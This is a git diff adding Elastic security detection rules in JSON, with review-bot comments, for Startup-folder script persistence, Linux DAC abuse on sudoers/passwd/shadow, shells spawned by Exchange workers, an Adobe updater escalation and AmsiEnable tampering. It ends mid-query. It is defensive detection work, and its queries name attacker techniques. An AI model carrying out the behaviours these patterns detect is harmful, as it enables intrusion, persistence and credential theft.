"type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + }, + { + "id": "T1547.009", + "name": "Shortcut Modification", + "reference": "https://attack.mitre.org/techniques/T1547/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json new file mode 100644 index 00000000000..096189eb54b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json 
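Review bot: The `query` has an operator-precedence problem: EQL binds `and` tighter than `or`, so the final `file.path : ("C:\\*\\Programs\\Startup\\*.vbs", …)` alternative stands on its own and is not constrained by `host.os.type == "windows"`, `event.type != "deletion"` or the `user.domain` exclusion — a script being deleted from a Startup folder, or written by an `NT …` account, alerts through that branch despite the intent stated in the inline comments. Wrap both path branches in one group: open a `(` before the `/* detect shortcuts created by wscript.exe or cscript.exe */` comment and close it with `)` after `"C:\\*\\Programs\\Startup\\*.js")`, so the shared conditions apply to each. The same query is shipped unchanged in f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json in this commit.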
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistent Scripts in the Startup Directory", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n\n file.extension : (\"lnk\", \"vbs\", \"vbe\", \"wsh\", \"wsf\", \"js\") and\n not (startsWith(user.domain, \"NT\") or endsWith(user.domain, \"NT\")) and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + }, + { + "id": "T1547.009", + "name": "Shortcut Modification", + "reference": "https://attack.mitre.org/techniques/T1547/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c70f2e-4616-439c-85ac-5b98415042fe_2.json b/packages/security_detection_engine/kibana/security_rule/f7c70f2e-4616-439c-85ac-5b98415042fe_2.json new file mode 100644 index 00000000000..24101162f80 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c70f2e-4616-439c-85ac-5b98415042fe_2.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential privilege escalation exploitation of DAC (Discretionary access control) file permissions. The rule identifies exploitation of DAC checks on sensitive file paths via suspicious processes whose capabilities include CAP_DAC_OVERRIDE (where a process can bypass all read write and execution checks) or CAP_DAC_READ_SEARCH (where a process can read any file or perform any executable permission on the directories).", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Linux DAC permissions", + "new_terms_fields": [ + "host.id", + "process.command_line", + "process.executable" + ], + "query": "event.category:process and host.os.type:linux and event.type:start and event.action:exec and\n(process.thread.capabilities.permitted:CAP_DAC_* or process.thread.capabilities.effective: CAP_DAC_*) and\nprocess.command_line:(*sudoers* or *passwd* or *shadow* or */root/*) and not user.id:\"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c70f2e-4616-439c-85ac-5b98415042fe", + "setup": "## Setup\n\n\nThis rule requires 
data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "f7c70f2e-4616-439c-85ac-5b98415042fe_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_108.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_108.json new file mode 100644 index 00000000000..3eea16b0699 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_108.json 
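Review bot: The `setup` text links to `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, while every other rule in this commit points at `fleet/current/`; it will go stale and should be `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`. The `query` also looks prone to alerts on setuid-root helpers such as `passwd` or `sudo visudo`: if Elastic Defend reports the invoking (non-zero) `user.id` at exec, those processes carry `CAP_DAC_OVERRIDE` in their effective set and their command line matches `*passwd*`/`*sudoers*`, so each new command line per host surfaces once through the new-terms logic; a `false_positives` entry describing this, as the SoftwareUpdate rule in this commit has, would help tuning. Minor: the `setup` string opens with `## Setup\n\n\n` where the sibling rules use a double newline.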
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Worker Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"w3wp.exe\" and process.parent.args : \"MSExchange*AppPool\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f81ee52c-297e-46d9-9205-07e66931df26_108", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_109.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_109.json new file mode 100644 index 00000000000..0c7b13d5ee2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_109.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Worker Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"w3wp.exe\" and process.parent.args : \"MSExchange*AppPool\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f81ee52c-297e-46d9-9205-07e66931df26_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106.json new file mode 100644 index 00000000000..058a04bd396 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Adobe Acrobat Reader PrivilegedHelperTool responsible for installing updates. For more information, refer to CVE-2020-9615, CVE-2020-9614 and CVE-2020-9613 and verify that the impacted system is patched.", + "false_positives": [ + "Trusted system or Adobe Acrobat Related processes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Child Process of Adobe Acrobat Reader Update Service", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.parent.name:com.adobe.ARMDC.SMJobBlessHelper and\n user.name:root and\n not process.executable: (/Library/PrivilegedHelperTools/com.adobe.ARMDC.SMJobBlessHelper or\n /usr/bin/codesign or\n /private/var/folders/zz/*/T/download/ARMDCHammer or\n /usr/sbin/pkgutil or\n /usr/bin/shasum or\n /usr/bin/perl* or\n /usr/sbin/spctl or\n /usr/sbin/installer or\n /usr/bin/csrutil)\n", + "references": [ + "https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f85ce03f-d8a8-4c83-acdc-5c8cd0592be7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic 
Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_109.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_109.json new file mode 100644 index 00000000000..00d235a1aee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_109.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of AmsiEnable Registry Key", + "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade detections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : 